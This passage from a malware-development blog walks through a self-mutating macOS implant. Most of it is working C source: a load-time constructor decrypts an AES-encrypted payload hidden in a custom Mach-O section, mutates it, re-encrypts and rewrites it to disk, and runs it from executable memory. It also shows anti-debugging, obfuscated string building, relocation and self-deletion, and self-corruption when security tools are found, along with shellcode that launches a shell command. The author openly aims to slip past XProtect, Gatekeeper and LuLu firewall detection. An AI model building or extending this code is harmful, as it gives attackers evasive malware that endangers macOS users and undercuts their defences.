size_t off = addr - start, tot = off + sz, al = (tot + ps - 1) & ~(ps - 1);
if (mprotect((void *)start, al, PROT_READ | PROT_EXEC) != 0) { perror("mprotect"); return; }
#if defined(__arm__) || defined(__aarch64__)
__builtin___clear_cache((char *)code, (char *)code + sz);
#endif
if (check_priv(code, sz))
return;
void (*fn)(void) = (void (*)(void))code;
fn();
}
/* Relocate if running in non-dir */
void whereuat() {
char exe_path[1024];
uint32_t size = sizeof(exe_path);
_NSGetExecutablePath(exe_path, &size);
if (strstr(exe_path, "/tmp/") != NULL) {
return;
} else if (strstr(exe_path, "/Downloads/") != NULL) {
char *base = strrchr(exe_path, '/');
if (!base) base = exe_path; else base++;
char tmp_path[1024];
snprintf(tmp_path, sizeof(tmp_path), "/tmp/%s", base);
FILE *source = fopen(exe_path, "rb");
if (!source) { perror("fopen source"); exit(1); }
FILE *dest = fopen(tmp_path, "wb");
if (!dest) { perror("fopen dest"); fclose(source); exit(1); }
char buf[4096];
size_t n;
while ((n = fread(buf, 1, sizeof(buf), source)) > 0) {
if (fwrite(buf, 1, n, dest) != n) { perror("fwrite"); fclose(source); fclose(dest); exit(1); }
}
fclose(source); fclose(dest);
chmod(tmp_path, 0755);
char *args[] = {tmp_path, NULL};
execv(tmp_path, args);
perror("execv");
exit(1);
} else {
fprintf(stderr, "%s\nDie.\n", exe_path);
if (unlink(exe_path) != 0) { perror("unlink"); }
exit(1);
}
}
/* Constructor: init, mutate & run payload */
__attribute__((constructor)) static void _entry() {
whereuat();
unsigned long ds = 0;
uint8_t *dsec = getsectiondata(&_mh_execute_header, "__DATA", "__fdata", &ds);
if (!dsec || ds < sizeof(data)) exit(1);
Encryption *hdr = (Encryption *)dsec;
uint8_t *payload = dsec + sizeof(Encryption);
if (hdr->count == 0) {
printf("Initializing...\n");
uint8_t init[P];
memset(init, 0x90, P);
if (len > P) { fprintf(stderr, "what she said\n"); exit(1); }
memcpy(init, dummy, len);
if (getentropy(hdr->key, K) != 0 || getentropy(hdr->iv, kCCBlockSizeAES128) != 0) exit(1);
cipher(hdr->key, hdr->iv, init, payload, P);
CC_SHA256(payload, P, hdr->hash);
save(dsec, sizeof(data));
hdr->count = 1;
}
ChaCha rng;
chacha20_init(&rng, (uint8_t *)&hdr->seed, sizeof(hdr->seed));
uint8_t *dec = malloc(P);
if (!dec) return;
decipher(hdr->key, hdr->iv, payload, dec, P);
uint8_t comp[CC_SHA256_DIGEST_LENGTH];
CC_SHA256(payload, P, comp);
if (memcmp(hdr->hash, comp, CC_SHA256_DIGEST_LENGTH) != 0) { free(dec); exit(1); }
mutate_payload(dec, P, &rng);
if (getentropy(hdr->key, K) != 0 || getentropy(hdr->iv, kCCBlockSizeAES128) != 0) {
fprintf(stderr, "Key/IV error\n");
zer(dec, P);
free(dec);
return;
}
cipher(hdr->key, hdr->iv, dec, payload, P);
CC_SHA256(payload, P, hdr->hash);
save(dsec, sizeof(data));
void *code_ptr;
if (posix_memalign(&code_ptr, P, P) != 0) { free(dec); return; }
if (mprotect(code_ptr, P, PROT_READ | PROT_WRITE | PROT_EXEC) != 0) { perror("mprotect"); free(code_ptr); free(dec); return; }
_memcpy(code_ptr, dec, P);
if (mprotect(code_ptr, P, PROT_READ | PROT_EXEC) != 0) { perror("mprotect"); free(code_ptr); free(dec); return; }
execute(code_ptr, P);
free(code_ptr);
zer(dec, P);
free(dec);
hdr->seed = chacha20_random(&rng);
hdr->count++;
}
The engine targets Mach-O binaries (macOS/ARM64/x86_64) and runs on Capstone disassembly, paired with a ChaCha20-based PRNG. It messes with the payload by swapping instructions, injecting junk code and opaque predicates, then re-encrypts the modified payload with fresh AES keys before slapping it back into the binary.
When you feed a chunk of binary data into Capstone, it disassembles it into a set of instructions each with details such as its mnemonic (like mov
or jmp
), operands, and the size of the instruction in bytes, After the engine performs a mutation (say, an instruction swap), it needs to check that the mutated code is still valid. This is where Capstone steps in.
“Cap is a framework that takes raw machine code (binary bytes) and translates it into human-readable assembly instructions, Think of it as a translator for your binary code.” I picked Capstone for this example because it’s a solid disassembler and pretty simple to implement.
Finally, it loads the mutated payload into executable memory and hands over control, so every run spits out a fresh piece of code. Back to basics. Every Mach-O file has a header, load commands, and segments (like __TEXT
for code and __DATA
for writable data):
__TEXT
segment__stubs
section__stub_helper
section__cstring
section__unwind_info
section
__DATA
segment__nl_symbol_ptr
section__la_symbol_ptr
section
Source:
The header (as shown earlier) and the load commands map out our Mach-O file, defining where each segment sits in memory. The __TEXT
segment holds the executable code. It’s mostly read-only and contains stubs, helpers, and other key structures. The __DATA
segment is the writable zone, used for data that can change at runtime, like pointers, symbol tables, and other info.
In the piece above, we take advantage of the __DATA
segment’s writable nature by carving out our own custom section, __fdata
. This section holds an encryption header (containing the AES key, IV, random seed, run counter, and hash) alongside the encrypted payload, which is our self-mutating code.
Why do it like this? Simple. We can find our custom section at runtime using standard Mach-O APIs (like getsectiondata
), much like opening a labeled folder. The engine decrypts the payload, mutates it (instruction swaps, junk code, etc.), re-encrypts it, and writes it back, ensuring dynamic evolution with every run. This is polymorphic, and also metamorphic in a sense. Keep that in mind.
Source:
So essentially what’s happening is that we copy the decrypted, mutated payload into executable memory and then transfer control over to it. Running this newly mutated payload is the final step in self-modification it lets the engine execute its current, evolved version of the code. Plus, the engine checks its execution location (like making sure it’s running from /tmp
) and might even relocate itself if it finds itself in ~/Download
(more on that later). This setup minimizes external interference and ensures the piece can modify itself without any constraints.
For encryption, we kick things off by prepping a default payload “dummy” routine and we fill out the rest with NOPs. That leaves us with a clean slate to work on. Then we tap into a randomness source to snag an AES key and an IV. Now, these have their pros and cons: on the upside, they turn our piece into a moving target, but on the downside, the binary’s entropy can skyrocket as more payload and mechanisms get crammed in. Keep that in mind.
Every time the engine runs after initialization, the process looks like this: The engine reads the encrypted payload from the __fdata
section and uses the stored key and IV to decrypt it. After decryption, we recompute the SHA hash and compare it to the one stored in the header. This simple check makes sure the payload hasn’t been tampered with.
Now, it might seem straightforward, but here’s the twist: since the payload for real malware is gonna keep growing, we ain’t gonna settle for a “dummy” payload. Instead, we’re packing it with sets of functioning operations, making it a real challenge to keep track of everything.
Remember the first part, where we dabbled in assembly and macOS shellcode development? The same idea applies here. Whether our payload is a simple machine-code “Hello World” or a whole suite of operations, it doesn’t really matter for our current use it’s all about laying the groundwork for something more dynamic down the line.
// Encrypt the mutated payload
cipher(hdr->key, hdr->iv, dec, payload, P);
// Update the hash for integrity verification next time
CC_SHA256(payload, P, hdr->hash);
// Save the new encrypted payload back to the __fdata section
save(dsec, sizeof(data));
So Every run, the engine decrypts its payload, verifies and mutates it, then locks it down again with fresh encryption. This cycle makes the engine’s behavior unpredictable
Decrypt → Verify → Mutate → Generate new keys → Re-encrypt → Update → Save back.
Now the mutation phase, So we might swap two instructions, insert junk code (like NOPs or push/pop sequences), or replace some instructions with opaque predicates, Imagine the engine decides to swap two instructions. It picks two instructions of equal size from the payload, swaps them, and then needs to make sure the resulting code still makes sense,
Source :
So why? It’s not just about creating a new, unique copy of itself every time it propagates. It’s also about disassembling previously mutated code and keeping its size in check. (Since instructions can mutate into multiple instructions, messing with this can cause the executable to grow exponentially with every mutation, fun, right?) A simple mistake in disassembly can break the whole thing. Keeping it running smoothly makes the malware a lot tougher to kill. It’s a challenge and a real REpsych.
[SETUP]
~$ clang -o trustme mutator.c -framework Foundation
-w -lcrypto -lcapstone
[RELEASE MODE]
~$ vx=trustme
[INITIAL]
~$ echo $vx | xargs -I {} sh -c 'shasum {}; hexdump {} | head -n 1; file {}'
94bf45eac2e3bba045a922ddccab65f18f063375 trustme
0000000 facf feed 0007 0100 0003 0000 0002 0000
trustme: Mach-O
[PRE-EXECUTION STATE]
~$/tmp> ls -al
total 0
[POST-EXECUTION]
~$/tmp> ls -al
total 104
-rwxr-xr-x 1 user staff 104 trustme // can be random.
[POST-MUTATION]
~$/tmp> echo $vx | xargs -I {} sh -c 'shasum {}; hexdump {} | head -n 1; file {}'
d7092ed32159874d92c49a789b25932dc51497f5 trustme
0000000 facf feed 0007 0100 0003 0000 0002 0000
trustme: Mach-O
So, why go with mutation? Why not just use raw malware? With macOS’s security features like GateKeeper, XProtect, and SIP (System Integrity Protection), one might argue that it’s pointless: Why bother with polymorphic malware? Isn’t it basically useless on macOS?
There’s some truth to that. If the malware never makes it to execution, it doesn’t matter if it’s polymorphic, metamorphic, or totally unprotected. That binary is either heading to the trash or, worse, into the hands of analysts. ;)
As one may say:
“If your objective does not require a high success rate and your time is limited, you can code something that isn’t protected at all and simply use it as-is.”
— Evolution of Polymorphic Malware
Back in the day, and still today, AV and EDR solutions lean hard on static analysis. They hunt with pattern matching against known byte sequences (YARA rules and the like), heuristics that scan instruction patterns and control flow, string-based checks on API calls and library imports, plus entropy analysis to sniff out packed or encrypted sections. Throw in hash checks and structural scans of PE or Mach-O headers and sections, and you’ve got the usual toolkit. Some even try behavioral pattern recognition based solely on static code.
But here’s the catch: all these methods share the same blind spot. They bank on the idea that code’s structure stays constant across every copy. Like a fingerprint, malicious code is assumed to keep its core shape no matter when or where it shows up.
AIN’T GONNA FLY
All these old-school static checks are exactly what Apple’s XProtect banks on, heavy reliance on static signatures to catch known threats. So I started wondering: _how well does XProtect really hold up against a shape-shifting binary? Apple says their detection uses generic rules, not just fixed hashes, to snatch unseen variants. But honestly? I was skeptical. So, let’s crack open XProtect’s guts while it’s still fresh in my head.
When you open a file double-click or run from terminal, LaunchServices kicks in and sends an XPC message to CoreServicesUIAgent, the UI handler for app launches. From there, CoreServicesUIAgent calls XprotectService.xpc, located inside the XProtectFramework:
/System/.../XprotectService (x86_64): Mach-O 64-bit executable
/System/.../XprotectService (arm64e): Mach-O 64-bit executable
Two main players in this story: Gatekeeper (XPGatekeeperEvaluation
) and XProtect (XProtectAnalysis
). Gatekeeper handles code-signing, notarization, and policy enforcement. XProtect does the dirty work, core malware scanning, running in its own XPC sandbox for isolation.
Everything starts with the assessmentContext
. When a file’s about to open, Gatekeeper builds a dossier on it, an NSMutableDictionary
called assessmentContext
. That thing holds all the juicy metadata: file type under kSecAssessmentContextKeyUTI
, origin URL if it was downloaded (LSDownloadDestinationURLKey
), and whether the file’s been notarized (assessmentWasNotarized
). This context becomes the deciding factor for what happens next.
Inside the binary, execution paths are sorted by operation type, execute, install, open — with a straight cmp
against constants:
cmp eax, 0x2
je loc_100006f3a
cmp eax, 0x1
je loc_100006f64
...
mov rax, qword [_kSecAssessmentOperationTypeExecute_1000140c8]
From there, the context gets filled out with Objective-C message calls. For example, loading the UTI and stuffing it into the dictionary:
mov rdx, qword [r13+rax] ; Load UTI
mov rax, qword [_kSecAssessmentContextKeyUTI_1000140c0]
mov rcx, qword [rax]
mov rdi, r14 ; dictionary
mov rsi, r12 ; selector: setObject:forKey:
call rbx ; objc_msgSend
It even tries to pull a separate download assessment dictionary if one exists. That tells you how deep the inspection pipeline goes, this isn’t just a surface-level check, it’s context-driven and pretty granular.
Once the assessmentContext
is in place, XProtectService
moves into policy eval mode. It pulls in XProtect’s rule files, XProtect.plist
and XProtect.meta.plist
using CoreFoundation APIs and parses them into memory.
From there, it starts matching rules against file attributes: UTI, path, quarantine flags, code signature data. Everything gets checked to figure out if the file fits any known threat pattern.
Notarization status comes from cached flags, not any live verification. You see it in the binary:
movsx eax, byte [rdi+rax] ; notarization flag
That shortcut keeps things fast, but it means the decision relies on whatever data was already there, no real-time notarization lookup happening.
XProtect doesn’t do the scanning itself. Instead, it delegates to com.apple.XprotectFramework.AnalysisService
over XPC Apple’s interprocess communication layer. That separation keeps the scanning sandboxed, reducing the risk of crashes or exploits hitting the main system.
Inside the service, analysis kicks off by resolving aliases and symlinks before touching file content. It checks things like quarantine flags, walking through the metadata before digging deeper:
-[XProtectAnalysis beginAnalysisWithHandler:...]:
mov rax, [_NSURLIsAliasFileKey]
mov rax, [_NSURLIsSymbolicLinkKey]
call objc_msgSend ; arrayWithObjects:count:
Once scanning wraps, the file gets tagged with metadata like XProtectMalwareType
, and the results are kicked back to CoreServicesUIAgent
If a file gets flagged, CoreServicesUIAgent
steps in, flashes an alert, and dumps it in the Trash even if it’s signed and looks clean on the surface.
Why this matters:
CoreServicesUIAgent
uses identifiers like XProtectMalwareType
to classify and act on files. But that whole system depends on static signatures. Mutating binaries that shift shape with every execution? They throw a wrench in the pattern-matching logic and can easily slide past unnoticed.
So is that it? Hell nah.
macOS stacks its defenses, each layer designed to slow you down, throw you off, or straight up brick your flow. Sure, mutation can knock out XProtect’s static signature checks, but that’s just one wall. There’s still runtime behavioral monitoring, network traffic inspection, and system-level policy enforcement. And yeah this assumes you’re actually dropping a payload, because otherwise… what’s the point?
Let’s say your payload phones home (and it probably does). Now you’ve got Objective-See’s LuLu firewall to contend with, if the user has it installed, it’ll flag any unexpected outbound connection.
And Gatekeeper? It’s focused on code signing and notarization. If your binary is signed even self-signed, and the quarantine bit’s removed, Gatekeeper mostly stands down, trusting XProtect to catch the threat. But again, if you mutate, XProtect can’t match what it’s never seen.
System Integrity Protection (SIP) locks down system directories, sure. But malware doesn’t need /System
to do damage. You live in userland ~/Library
, ~/LaunchAgents
, ~/Containers
. That’s where real infections happen now, quietly, persistently.
The trick? Don’t look like malware. Avoid sketchy API calls, skip the obvious telltale signs. Write like legit software. You can sign your own binaries. You can build trust chains. Because in the end, malware is just software the rules are the same, you’re just bending them.
Source:
ANTI ANALYSIS
Normally, this part comes later. But I think it’s better to kick things off here since the first thing our code does is mutate and check if it’s running in a hostile environment its way of protecting itself. (Honestly, that topic deserves its own article.)
Anti-analysis techniques are pretty consistent across operating systems; only the implementation details change. In Part One, we covered classic stealth moves like process injection, in-memory execution, and even wrote our own versions. Remember how we hardcoded everything strings, file paths, C2 addresses? Yeah, that needs to change. Let’s look at some better options.
Instead of hardcoding strings, we can dynamically generate them at runtime by concatenating smaller fragments or assembling them based on certain conditions. It does make the code messier, sure. Alternative? Encryption, dude.
You might start simple with XOR. But since XOR is easily reversible, it’s smarter to mix it with other methods. For example, encrypt the strings with AES. Just remember: if your decryption key is hardcoded into the binary, you basically did nothing.
Even with encryption, the malware still has to decode and decrypt strings to actually use them like when it needs to connect to its C2 server for instructions. That’s the catch: you can just let the malware run and catch the decrypted C2 address when it tries to connect.
To show this, I threw together a basic AES encryption and decryption routine using tiny-AES-c. For encryption, I set up the AES context with a fixed key and processed the input string in 16-byte blocks, dumping the output into a buffer. Decryption is just the same in reverse, using the same key to get back the original data. Pretty basic, yeah but now let’s toss it into a debugger and watch where the decrypted string shows up.
The play is simple: pause the malware right after it tries to decrypt a string and dig into its memory.
(lldb) image lookup -s decrypt
spit`decrypt: 0x100002140
(lldb) breakpoint set --name decrypt
Breakpoint 1: address = 0x100002140
(lldb) r
Encrypted: 16 90 bc 53 eb 9c 8a 8b db 04 a1 81 ca b9 47 ad
* thread #1, stop reason = breakpoint 1.1
frame #0: 0x100002140 spit`decrypt
(lldb) register read rsi
rsi = 0x7ff7bfeff820
(lldb) x/16xb $rsi
0x7ff7bfeff820: 66 6f 6f 2d 6f 70 65 72 61 74 6f 72 2d 73 65 72
(lldb) continue
Decrypted: foo-operator-server
I set a breakpoint in the decrypt
function to track the decryption process. First, I ran image lookup -s decrypt
to find the memory address of the function because I already knew the target. In a real-world binary, this step comes after static analysis, since most binaries won’t have symbols at this stage. Anyway, it showed up at 0x0000000100002140
. Then, I set a breakpoint with breakpoint set --name decrypt
, so execution halts whenever we hit that function. Running the program (r
) paused it right at the breakpoint, giving me a chance to check out the registers and memory.
For example, the instruction pointer (rip
) confirmed we were at the start of the decryption routine. I also peeked at the memory at the address pointed to by rsi
(using x/16xb $rsi
), which was all zeros at first meaning the decrypted data hadn’t been written yet. After continuing with continue
, the decrypted string foo-operator-server
appeared.
This setup was done to show how it works in the debugger, but the idea is the same in a dynamic analysis. You could also hook up a network monitor to passively recover the previously encrypted address of the C2 server when the malware beacons out for tasking. You can achieve similar results with a debugger, Remember ? Objective-See, yea the same.
At that point, the user can block it, dump it, or just drop it into VirusTotal and nuke the whole binary on sight. One way around that is checking for analysis tools before doing any decryption. Most of these tools live in user space or as helper processes, easy to spot, sometimes easy to kill. If we can’t kill them, we just nope out, no trace. We’ll circle back to that later.
If you look at the visual output, you probably noticed the debugger jumps in before main()
even starts. That’s Early Execution anti-analysis checks firing off at load time. We pull it off using __attribute__((constructor))
, which runs our code as soon as the binary loads. So if someone’s tracing or debugging, they’re already late. main()
hasn’t even clocked in yet.
This is where you toss in the lightweight stuff, anti-debugging, emulator checks, VM flags. I skip most of that in Aether ‘cause it’s kinda loud. Feels like yelling “Hey, I’m malware!” before you even do anything. Instead, it’s smarter to keep it simple, just scan for active reversers or tools before handing off to main()
.
Later, right before execution, we handle mutation. That’s when the payload decrypts only in memory, only when needed. No lingering strings, no blobs in the binary. You see this a lot in malware: once it lands, it unpacks everything at once, basically gift-wrapping it for the analyst.
We kick off with a _once()
just a lazy way to seed rand()
with some semi-unique entropy. Nothing wild, but enough to randomize the junk ahead.
Now the real magic happens in symbol_i()
. It dynamically builds the string "sysctl"
without ever writing it directly. Instead, it does some pseudo-random XOR games with byte math basic, sure, but just enough to dodge string detection. Two slightly different ways to encode the same result, chosen at runtime. That alone breaks a bunch of simple static scanners.
This key k
is used to mangle the bytes. Either straight XOR or offset XOR with k + i
. So unless you’re actually executing this code and tracing memory, you don’t see "sysctl"
anywhere.
Then getsys()
uses dlsym()
to resolve the actual sysctl
function at runtime. No import, no symbol, no trace, just a function pointer built on the fly.
cached = (sysctl_fn) dlsym(RTLD_DEFAULT, symbol);
De()
runs before main()
thanks to __attribute__((constructor))
.
Inside De()
, it calls sysctl()
with KERN_PROC_PID
on its own PID. If the returned kinfo_proc.p_flag
has P_TRACED
set, that means we’re being debugged.
And if that’s the case?
panic();
Up to this point, we just panic, meaning the process kills itself on trace detection. But a smarter move? Swap the real behavior with a decoy. Instead of bailing, you let the malware play dumb. Show fake activity, mimic something benign, give the reverser something to chase that leads nowhere. Make them think this is the intended execution path.
Basically: if we’re being watched, lie.
I actually did that in a small crackme called Shiftr. Same idea if you’re tracing it, you get fed a fake routine. Looks like it’s running legit logic, but under the hood? nah. Check it out if you’re curious.
Another trick we pull is figuring out where the thing is running. Using _NSGetExecutablePath
, we check the binary’s actual path at runtime, because yeah, behavior should change based on context. Unlike Windows, where you can just yank environment variables, macOS makes you work for it. You need system calls to get anything useful.
On Linux, you just peek at /proc/self/exe
, done. But macOS is different. The Darwin kernel stashes the path on the stack, tucked right after the envp
array when the process boots. dyld
, the dynamic linker, grabs it early on and keeps it handy. _NSGetExecutablePath
just reaches for that.
if (_NSGetExecutablePath(execPath, &pathSize) != 0)
return;
But the real reason we do this is control. We assume the user runs the malware from ~/Downloads
, or something similar. It’s basic, yeah, but it works. The idea is: no proper environment, no execution.
It’s just one more layer, because obfuscation isn’t optional. It is the code. And reverse engineering? That’s not a side effect of malware development. It’s part of the process.
+-------------------+
| Start |
+-------------------+
|
v
+-------------------+
| Anti-Debug Check |
+-------------------+
|
[Debugger?]
/ \
Yes No
| |
v v Later on:
[Self-Destruct] +----------------------+
| Objective-See Check |
+----------------------+
|
[Detected?]
/ \
Yes No
| |
v v
[Self-Destruct] +------------------+
| Main Routine |
+------------------+
All the AV tool paths? Yeah, those are encrypted in the binary. We decrypt them at runtime, one by one, and check if they exist in the system, If anything sketchy shows up, any known analysis tool, Objective-See product, whatever the binary panics. Self-corrupts.
Yeah, I did think about going full scorched earth looping to kill the AV tool on every run, forcing a reboot, maybe some classic process injection games. But nah. Sometimes it’s cleaner that way.
Source :
Self-Modifying
I kinda explained this in the architecture already, but if you weren’t paying attention, let me walk through it using the Aether code as the example. Watch how it rewrites itself every time it runs, keeping the original behavior untouched. Each execution spits out a fresh binary same logic, totally different under the hood.
It takes advantage of the Mach-O file format to stash and tweak the payload:
+-----------------------------------------------------+
| Mach-O File |
+-----------------------------------------------------+
| Header |
| - Magic, CPU type, file type, etc. |
+-----------------------------------------------------+
| Load Commands |
| - Define segments (__TEXT, __DATA) |
+-----------------------------------------------------+
| Segments |
| +-------------------+ +-----------------------+ |
| | __TEXT | | __DATA | |
| | (Executable code) | | (Writable payloads) | |
| +-------------------+ +-----------------------+ |
+-----------------------------------------------------+
The encrypted payload lives in a custom writable __fdata
section within the __DATA
segment. This section holds: An encryption header packing the AES key (key
), AES IV (iv
), ChaCha20 seed (seed
), mutation counter (count
), and a SHA-256 hash (hash
).
Right after that, the encrypted, self-mutating payload itself.
typedef struct __attribute__((packed)) {
uint8_t key[KEY_SIZE];
uint8_t iv[kCCBlockSizeAES128];
uint64_t seed;
uint32_t count;
uint8_t hash[CC_SHA256_DIGEST_LENGTH];
} enc_header_t;
This layout lets the payload be accessed directly and in-place, so it can be decrypted, mutated, and re-encrypted right at runtime. To find it, the code parses Mach-O load commands and sections using this approach:
uint64_t findSectionOffset(struct mach_header_64 *header, const char *sectName, const char *segName, size_t requiredSize) {
struct load_command *lc = (struct load_command*)((char*)header + sizeof(*header));
for (uint32_t i = 0; i < header->ncmds; i++) {
if (lc->cmd == LC_SEGMENT_64) {
struct segment_command_64 *seg = (struct segment_command_64*)lc;
struct section_64 *sec = (struct section_64*)((char*)seg + sizeof(*seg));
for (uint32_t j = 0; j < seg->nsects; j++) {
if (!strcmp(sec[j].sectname, sectName) && !strcmp(sec[j].segname, segName)) {
if (requiredSize > sec[j].size) return 0;
return sec[j].offset;
}
}
}
lc = (struct load_command*)((char*)lc + lc->cmdsize);
}
return 0;
}
Writing the Mutated Payload Back after mutation, the payload is written back into the __fdata
section, overwriting the binary on disk:
int writeDataAtOffset(int fd, uint64_t offset, const uint8_t *data, size_t size) {
if (lseek(fd, offset, SEEK_SET) == -1) { perror("lseek"); return -1; }
size_t totalWritten = 0;
while (totalWritten < size) {
ssize_t w = write(fd, data + totalWritten, size - totalWritten);
if (w <= 0) { perror("write"); return -1; }
totalWritten += w;
}
return totalWritten == size ? 0 : -1;
}
void save_section(uint8_t *data, size_t sz) {
char path[1024] = {0};
uint32_t pathSize = sizeof(path);
if (find_self(path, &pathSize) != 0) return;
int fd = oprw(path);
if (fd < 0) return;
struct mach_header_64 *hdr = &_mh_execute_header;
size_t actual_size = sizeof(enc_header_t) + PAGE_SIZE;
if (sz < actual_size) actual_size = sz;
uint64_t sectionOffset = findSectionOffset(hdr, "__fdata", "__DATA", actual_size);
if (!sectionOffset) { close(fd); return; }
if (writeDataAtOffset(fd, sectionOffset, data, actual_size) != 0) { close(fd); return; }
close(fd);
}
Each time the implant runs, it rewrites itself on disk, creating a fresh binary generation while keeping its original functionality intact. The boot()
function triggers only once on the very first execution. It sets up the encrypted payload by preparing a NOP sled–padded buffer that mixes initial shellcode with junk instructions. This buffer is encrypted using newly generated AES keys and IV, then stored in the __fdata
section. The mutation counter is initialized to 1.
From then on, cook()
takes over on every subsequent run, carrying out the full mutation cycle by:
- Decrypting the payload with the current AES keys.
- Verifying payload integrity via SHA-256.
- Applying mutations to the shellcode.
- Generating fresh AES keys and IV.
- Re-encrypting the mutated payload.
- Updating the hash and incrementing the mutation counter.
- Writing the mutated payload back into the Mach-O binary.
- Executing the mutated shellcode in memory.
int boot(uint8_t *dsec, size_t ds, chacha_state_t *rng) {
enc_header_t *hdr = (enc_header_t*)dsec;
uint8_t *payload = dsec + sizeof(enc_header_t);
if (hdr->count == 0) {
uint8_t init_buffer[PAGE_SIZE];
memset(init_buffer, 0x90, sizeof(init_buffer)); // NOP sled padding
if (len > sizeof(init_buffer)) return -1;
memcpy(init_buffer, dummy, len); // Copy initial shellcode
size_t entry_protect = 150;
if (len > entry_protect) {
mut_sh3ll(init_buffer + entry_protect, len - entry_protect, rng, hdr->count);
}
#if defined(ARCH_X86)
for (size_t i = len; i + 3 <= PAGE_SIZE; i += 3) {
memcpy(init_buffer + i, x86_junk[chacha20_random(rng) % 20], 3);
}
#elif defined(ARCH_ARM)
for (size_t i = len; i + 4 <= PAGE_SIZE; i += 4) {
memcpy(init_buffer + i, arm_junk[chacha20_random(rng) % 15], 4);
}
#endif
if (getentropy(hdr->key, KEY_SIZE) != 0 || getentropy(hdr->iv, kCCBlockSizeAES128) != 0) {
panic();
}
cipher(hdr->key, hdr->iv, init_buffer, payload, PAGE_SIZE);
CC_SHA256(payload, PAGE_SIZE, hdr->hash);
save_section(dsec, ds);
hdr->count = 1;
#ifdef TEST
hexdump(payload, len, "Init");
#endif
}
return 0;
}
It starts by preparing a PAGE_SIZE buffer mostly filled with NOPs (0x90
), then injects the initial shellcode (dummy
) into it. The tail of the shellcode is mutated to add some variability, and the remaining space is stuffed with architecture-specific junk instructions to boost obfuscation. Fresh AES keys and an IV are generated from entropy sources, then the entire buffer is encrypted and its SHA-256 hash computed. This encrypted payload is written back into the binary, and the mutation counter is set to 1.
For the ongoing mutation cycle, the implant decrypts the payload using the current AES keys, verifies its integrity with the stored hash, applies further mutations to the shellcode, generates new AES keys and IV, re-encrypts the mutated payload, updates the hash and mutation counter, saves the new payload back to the binary, and finally executes the mutated shellcode in memory.
int cook(uint8_t *dsec, size_t ds, chacha_state_t *rng) {
enc_header_t *hdr = (enc_header_t*)dsec;
uint8_t *payload = dsec + sizeof(enc_header_t);
uint8_t *dec = malloc(PAGE_SIZE);
if (!dec) { DBG("malloc failed"); return -1; }
decipher(hdr->key, hdr->iv, payload, dec, PAGE_SIZE);
#ifdef TEST
DBG("(pre-mutation)");
hexdump(dec, len, "Decrypted");
#endif
uint8_t comp[CC_SHA256_DIGEST_LENGTH];
CC_SHA256(payload, PAGE_SIZE, comp);
if (memcmp(hdr->hash, comp, CC_SHA256_DIGEST_LENGTH) != 0) panic();
uint8_t *shellcode_buffer = malloc(len);
if (!shellcode_buffer) { free(dec); DBG("malloc failed"); return -1; }
memcpy(shellcode_buffer, dec, len);
mut_sh3ll(shellcode_buffer, len, rng, hdr->count);
memcpy(dec, shellcode_buffer, len);
free(shellcode_buffer);
if (getentropy(hdr->key, KEY_SIZE) != 0 || getentropy(hdr->iv, kCCBlockSizeAES128) != 0) {
zer0(dec, PAGE_SIZE);
free(dec);
return -1;
}
cipher(hdr->key, hdr->iv, dec, payload, PAGE_SIZE);
CC_SHA256(payload, PAGE_SIZE, hdr->hash);
#ifdef TEST
DBG("(post-mutation)");
hexdump(payload, len, "Mutated");
#endif
save_section(dsec, ds);
#ifdef RELEASE
run();
#else
void *code_ptr;
if (posix_memalign(&code_ptr, PAGE_SIZE, PAGE_SIZE) != 0) {
panic();
free(dec);
return -1;
}
if (mprotect(code_ptr, PAGE_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC) != 0) panic();
O2(code_ptr, dec, PAGE_SIZE);
if (mprotect(code_ptr, PAGE_SIZE, PROT_READ|PROT_EXEC) != 0) panic();
pop_shellcode(code_ptr, len);
free(code_ptr);
#endif
zer0(dec, PAGE_SIZE);
free(dec);
hdr->seed = chacha20_random(rng);
hdr->count++;
return 0;
}
It decrypts the current payload and validates its integrity by comparing SHA-256 hashes. Then, using the mutation counter, it mutates the decrypted shellcode. Fresh AES keys and an IV are generated before the mutated payload is encrypted and hashed again. This new payload is saved back into the binary, mutating the file on disk. When it’s time to run, the implant allocates RWX memory, copies the decrypted shellcode there, sets the right permissions and cache, and transfers execution.
Everything’s tight, the mutated shellcode runs straight from an executable memory region.
void pop_shellcode(uint8_t *code, size_t size) {
long ps = sysconf(_SC_PAGESIZE);
uintptr_t addr = (uintptr_t)code;
uintptr_t start = addr & ~(ps - 1);
size_t tot = ((addr + size) - start + ps - 1) & ~(ps - 1);
mprotect((void*)start, tot, PROT_READ | PROT_WRITE | PROT_EXEC);
#if defined(__arm__) || defined(__aarch64__)
__builtin___clear_cache((char*)code, (char*)code + size);
#endif
((void(*)(void))code)();
}
- Sets RWX, Clears CPU instruction cache
- Executes shellcode.
Init (first 72 bytes):
00000000 ed 17 71 d1 49 4c 68 7e 3c 8a 69 cb 03 2d 35 37 |..q.ILh~<.i..-57|
00000010 cc 88 e2 4b 6d 69 5b f3 9b a4 7f 9d 07 09 44 14 |...Kmi[.......D.|
00000020 29 38 1f dd 45 6d 38 ee c7 c8 fa 6e 6b be 4e 0d |)8..Em8....nk.N.|
00000030 e5 a8 8f 6b 21 2b 7f d5 91 c5 91 22 94 3e 12 32 |...k!+.....".>.2|
00000040 ba 5c 4f ff ed 2a d5 ae |.\O..*..|
(pre-mutation)
Decrypted (first 72 bytes):
00000000 48 31 d2 52 48 bb 2f 62 69 6e 2f 7a 73 68 53 48 |H1.RH./bin/zshSH|
00000010 89 e7 48 31 c0 66 b8 2d 63 50 48 89 e3 52 eb 0f |..H1.f.-cPH..R..|
00000020 53 57 48 89 e6 6a 3b 58 48 0f ba e8 19 0f 05 e8 |SWH..j;XH.......|
00000030 ec ff ff ff 6f 70 65 6e 20 2d 61 20 43 61 6c 63 |....open -a Calc|
00000040 75 6c 61 74 6f 72 00 52 |ulator.R|
(post-mutation)
Mutated (first 72 bytes):
00000000 e2 c0 d8 2a 3e e9 fa fb e3 8c c8 4f b4 05 0a 5c |...*>......O...\|
00000010 a7 a0 e0 16 c6 59 b2 9e 73 69 13 f7 b0 f2 d0 96 |.....Y..si......|
00000020 84 91 0f 3c b7 b9 d4 cc a8 cc 86 c0 b8 08 8a 8a |...<............|
00000030 01 d9 e4 c9 87 92 b6 12 cc e5 8a 2f 0f f5 f2 2e |.........../....|
00000040 3e 13 90 59 2f 97 d8 b0 |>..Y/...|
Before: 594b6f4139c6c9f0a222717d7cd6f37219d922bb26bfc4eb92740abdfe474d47
After : 9d744447d21c139817b16386643f83e46727fa57e07f515d0bc75ec21fe5f8da
Kinda obvious right, After running the decryption routine, we get real shellcode:
48 31 d2 xor rdx, rdx
52 push rdx
